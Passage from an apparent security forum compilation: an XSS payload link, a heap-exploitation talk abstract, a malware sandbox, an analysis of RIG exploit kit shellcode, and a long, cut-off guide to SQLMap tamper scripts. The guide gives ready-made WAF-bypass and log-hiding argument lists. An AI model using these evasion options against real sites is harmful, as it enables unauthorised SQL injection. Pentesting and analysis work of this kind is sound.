Complet: http://www.exploit-db.com/papers/35425/

XSS Payloads For several years I've been looking for different types of payloads I could use or adapt to my XSS exploits. I ended up with pieces of code spread everywhere, spending more time to search for what I needed than just rewriting it... Obviously it was time to organize a little bit all this mess, and to share. I could build this library thanks to many people who help me learn, and code. Now it is my turn to share. Enjoy! Link: XSS Payloads

Project Heapbleed [ posted by census on 27.11.2014 ] CENSUS researcher Patroklos Argyroudis has recently presented a talk on heap exploitation abstraction at two conferences, namely ZeroNights 2014 (Moscow, Russia) and BalCCon 2014 (Novi Sad, Serbia). In the talk titled “Project Heapbleed”, Patroklos has collected the experience of exploiting allocators in various different target applications and platforms. He focused on practical, reusable heap attack primitives that aim to reduce the exploit development time and effort. The talk’s abstract was the following: Heap related bugs (such as buffer overflows, use-after-frees, dangling/stale pointers, double frees) leading to corruptions of virtual memory and vulnerable conditions, constitute the most common type of memory corruption bugs. The exploitation of heap vulnerabilities is a process that requires a lot of time and effort. It requires meticulous understanding of the underlying heap allocator; its data structures metadata) and its allocation/deallocation algorithms. It requires understanding of how the target application uses the API provided by the heap allocator to manage dynamic memory and the allocation patterns that emerge due to this use. It also requires understanding of the application-specific data and how/where these are placed on the heap. Finally, it requires studying of the way the user can influence the application and use its provided functionality to control its heap as reliably as possible with the goal to create conditions aiding exploitation. All these must be viewed in the context of complicated bugs, since low-hanging fruits are scarce, and the vendors’ adoption of increasingly sophisticated exploitation mitigation technologies. We argue that although the details between the different heap allocators, target applications and bugs at hand obviously vary, the heap exploitation methodologies that have been formed by practical experience can be abstracted to reusable primitives that can be applied to new targets. Project Heapbleed is our attempt to define, clearly articulate, categorize and where applicable implement these primitives, aiming to provide a practical reusable heap exploitation toolset. The slides are available here. Sursa: census | Project Heapbleed

Drakvuf DRAKVUF Dynamic Malware Analysis Download as .tar.gz View on GitHub Introduction DRAKVUF is an agentless dynamic malware analysis system built on Xen, LibVMI, Volatility and Rekall. It allows for in-depth execution tracing of malware samples, extracting deleted files from memory and more. Hardware requirements For DRAKVUF to work you will need an Intel CPU with virtualization support and with Extended Page Tables (EPT). DRAKVUF is not going to work on any other CPUs or without EPT. It is recommended to have at least 8GB RAM but you may be able get by with less. Supported guests DRAKVUF currently supports Windows 7 VMs, both 32 and 64-bit versions. Demos Sursa: DRAKVUF Dynamic Malware Analysis

RIG Exploit Kit - Shellcode analysis Brad published a traffic analysis exercise which I had a quick look at and felt that I wanted to take it to the next level so I started looking at how to decode the payload delivered by the exploit kit. I get the shellcode from the Flash exploit as it's provided as a hex-encoded string starting with "90909090" (NOP): An easy way to go is to create an executable from the shellcode utilizing Shellcode2Exe to be able to step through it in OllyDbg. Taking the step into shellcode Loading it up in Olly, it will start with a loop which decodes the payload URL using XOR as seen below. The key can be found by inspecting ESI when first hitting the loop and the encoded data can be found by inspecting EDI. After decoding: The decoding loop will continue until the decoded byte is "!" (0x21), the reason will be explained later in the post under "Multiple payloads". The shellcode uses URLDownloadToCacheFileA to download the payload. Should the payload be successfully downloaded, it will be opened with CreateFileA and read with ReadFile into memory allocated using VirtualAlloc. After reading the file it will be decrypted using RC4 cipher with a key defined in the shellcode. I recommend reading the post from VRT on how to recognize RC4 when debugging. This is the function found in the shellcode: Inspecting EDI when hitting the above lines it's found to have the following content: EDI is pointing to the first byte of the key and EBP holds the key length which is 5 giving the key m3S4V. At this point it's possible to let the shellcode run until CloseHandle is called and the decoded payload has been written back to disk or write a script for decoding the payload extracted from the PCAP. A small implementation of the RC4 cipher can be found here (Python). Multiple payloads What is the most interesting thing about the shellcode is that it carries more functionality than isn't used. The shellcode is used to download one payload, but the shellcode supports multiple payloads. After calling CreateProcessA, the shellcode will step through the recently used URL looking for the end of the string (0x00), and comparing the next byte with "!" (0x21). If it's true, the shellcode will end otherwise it will start over with a new payload. An example of URL-list would look like this: <url1>0x00<url2>0x00<urlN>0x0021 Conclusion of sorts RIGs shellcode have the capability to download and execute multiple payloads which are encrypted using RC4 (5 byte key). The URL-list is encoded using XOR (5 byte key). API-calls used in the shellcode (in order of first call): - LoadLibraryA - URLDownloadToCacheFileA - CreateFileA - VirtualAlloc - ReadFile - SetFilePointer - WriteFile - VirtualFree - CloseHandle - CreateProcessA You can find the hex-encoded shellcode on [pastebin]. Upplagd av teh syntx kl. 11:57 Sursa: tHEMbITS: RIG Exploit Kit - Shellcode analysis

SQLMap Tamper Scripts By Dana TaylorSeptember 24, 2014Pentestsqlmap, tamper scripts When using SQLMap Tamper scripts while doing a pentest can be a bit confusing and a lot of work to figure out which scripts you need to use and when to use them. I have an upcoming pentest I need to perform and figured this is the perfect time to organize all of this. First of all, not all scripts are created equal. Some work for general run-of-the mill sql injection attacks and others are for specific databases. Some are not actually sure if it works on all databases and some have only been officially tested against older versions of database applications. This is the very definition of hit and miss. I reviewed each tamper script and tried to place them in boxes. If you have feedback on any of these boxes PLEASE don’t be shy! Let me know in the comment section. I want this to be a good resource and your help would be greatly appreciated. The General Scripts section contains both non-specific database exploits as well as those that cover a wide range of databases. In my thoughts, this would be a good start script box to use as an initial hit on an application. Again, feedback appreciated. I am going to include the syntax to run each section as well as one to run every script. SQLMap will organize them automatically. However, I captured traffic from running all scripts and it didn’t look familiar at all. not sure if it is a good idea to do this or not. Feedback welcome! Jump to general Microsoft-Access mssql mysql oracle postresql sap sqlite --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords General Scripts --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes apostrophemask Replaces apostrophe character with its UTF-8 full width counterpart apostrophenullencode Replaces apostrophe character with its illegal double unicode counterpart base64encode Base64 all characters in a given payload between Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’ Replaces equals operator (‘=’) with ‘BETWEEN # AND #’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases chardoubleencode Double url-encodes all characters in a given payload (not processing already encoded) Notes: * Useful to bypass some weak web application firewalls that do not double url-decode the request before processing it through their ruleset charencode Url-encodes all characters in a given payload (not processing already encoded) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS charunicodeencode Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) Requirement: * ASP * ASP.NET Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 Notes: * Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset equaltolike Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character (‘=’) * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases greatest Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases ifnull2ifisnull Replaces instances like ‘IFNULL(A, ’ with ‘IF(ISNULL(A), B, A)’ Requirement: * MySQL * SQLite (possibly) * SAP MaxDB (possibly) Tested against: * MySQL 5.0 and 5.5 Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function multiplespaces Adds multiple spaces around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases space2randomblank Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass several web application firewalls unionalltounion Replaces UNION ALL SELECT with UNION SELECT unmagicquotes Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection Microsoft Access --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords appendnullbyte Appends encoded NULL byte character at the end of payload Requirement: * Microsoft Access Notes: * Useful to bypass weak web application firewalls when the back-end database management system is Microsoft Access – further uses are also possible equaltolike Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character (‘=’) * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases greatest Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases multiplespaces Adds multiple spaces around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases unionalltounion Replaces UNION ALL SELECT with UNION SELECT unmagicquotes Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection Microsoft SQL Server --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes between Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’ Replaces equals operator (‘=’) with ‘BETWEEN # AND #’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases charencode Url-encodes all characters in a given payload (not processing already encoded) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS charunicodeencode Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) Requirement: * ASP * ASP.NET Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 Notes: * Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset equaltolike Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character (‘=’) * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases greatest Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases multiplespaces Adds multiple spaces around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters percentage Adds a percentage sign (‘%’) infront of each character Requirement: * ASP Tested against: * Microsoft SQL Server 2000, 2005 * MySQL 5.1.56, 5.5.11 * PostgreSQL 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass sp_password Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs Requirement: * MSSQL Notes: * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure * Reference: The SQL Injection Knowledge Base space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2dash Replaces space character (‘ ‘) with a dash comment (‘–‘) followed by a random string and a new line (‘\n’) Requirement: * MSSQL * SQLite Notes: * Useful to bypass several web application firewalls * Used during the ZeroNights SQL injection challenge, https://proton.onsec.ru/contest/ space2mssqlblank Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 Notes: * Useful to bypass several web application firewalls space2mysqldash Replaces space character (‘ ‘) with a dash comment (‘–‘) followed by a new line (‘\n’) Requirement: * MySQL * MSSQL Tested against: Notes: * Useful to bypass several web application firewalls. space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases space2randomblank Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass several web application firewalls unionalltounion Replaces UNION ALL SELECT with UNION SELECT unmagicquotes Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection MySQL --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor between Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’ Replaces equals operator (‘=’) with ‘BETWEEN # AND #’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases bluecoat Replaces space character after SQL statement with a valid random blank character. Afterwards replace character = with LIKE operator Requirement: * Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147 Tested against: * MySQL 5.1, SGOS Notes: * Useful to bypass Blue Coat’s recommended WAF rule configuration charencode Url-encodes all characters in a given payload (not processing already encoded) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS charunicodeencode Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) Requirement: * ASP * ASP.NET Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 Notes: * Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset concat2concatws Replaces instances like ‘CONCAT(A, ’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, ’ Requirement: * MySQL Tested against: * MySQL 5.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the CONCAT() function equaltolike Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character (‘=’) * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases greatest Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases halfversionedmorekeywords Adds versioned MySQL comment before each keyword Requirement: * MySQL < 5.1 Tested against: * MySQL 4.0.18, 5.0.22 Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL * Used during the ModSecurity SQL injection challenge, ModSecurity: Open Source Web Application Firewall ifnull2ifisnull Replaces instances like ‘IFNULL(A, ’ with ‘IF(ISNULL(A), B, A)’ Requirement: * MySQL * SQLite (possibly) * SAP MaxDB (possibly) Tested against: * MySQL 5.0 and 5.5 Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function modsecurityversioned Embraces complete query with versioned comment Requirement: * MySQL Tested against: * MySQL 5.0 Notes: * Useful to bypass ModSecurity WAF/IDS modsecurityzeroversioned Embraces complete query with zero-versioned comment Requirement: * MySQL Tested against: * MySQL 5.0 Notes: * Useful to bypass ModSecurity WAF/IDS multiplespaces Adds multiple spaces around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters percentage Adds a percentage sign (‘%’) infront of each character Requirement: * ASP Tested against: * Microsoft SQL Server 2000, 2005 * MySQL 5.1.56, 5.5.11 * PostgreSQL 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2hash Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’) Requirement: * MySQL Tested against: * MySQL 4.0, 5.0 Notes: * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, ModSecurity: Open Source Web Application Firewall space2morehash Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’) Requirement: * MySQL >= 5.1.13 Tested against: * MySQL 5.1.41 Notes: * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, ModSecurity: Open Source Web Application Firewall space2mysqldash Replaces space character (‘ ‘) with a dash comment (‘–‘) followed by a new line (‘\n’) Requirement: * MySQL * MSSQL Tested against: Notes: * Useful to bypass several web application firewalls. space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases space2randomblank Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass several web application firewalls unionalltounion Replaces UNION ALL SELECT with UNION SELECT unmagicquotes Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string versionedkeywords Encloses each non-function keyword with versioned MySQL comment Requirement: * MySQL Tested against: * MySQL 4.0.18, 5.1.56, 5.5.11 Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL versionedmorekeywords Encloses each keyword with versioned MySQL comment Requirement: * MySQL >= 5.1.13 Tested against: * MySQL 5.1.56, 5.5.11 Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection Oracle --tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor between Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’ Replaces equals operator (‘=’) with ‘BETWEEN # AND #’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases charencode Url-encodes all characters in a given payload (not processing already encoded) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS equaltolike Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character (‘=’) * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases greatest Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases multiplespaces Adds multiple spaces around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases space2randomblank Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass several web application firewalls unionalltounion Replaces UNION ALL SELECT with UNION SELECT unmagicquotes Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection PostgreSQL --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor between Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’ Replaces equals operator (‘=’) with ‘BETWEEN # AND #’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases charencode Url-encodes all characters in a given payload (not processing already encoded) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS charunicodeencode Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) Requirement: * ASP * ASP.NET Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 Notes: * Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset equaltolike Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character (‘=’) * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases greatest Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases multiplespaces Adds multiple spaces around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters percentage Adds a percentage sign (‘%’) infront of each character Requirement: * ASP Tested against: * Microsoft SQL Server 2000, 2005 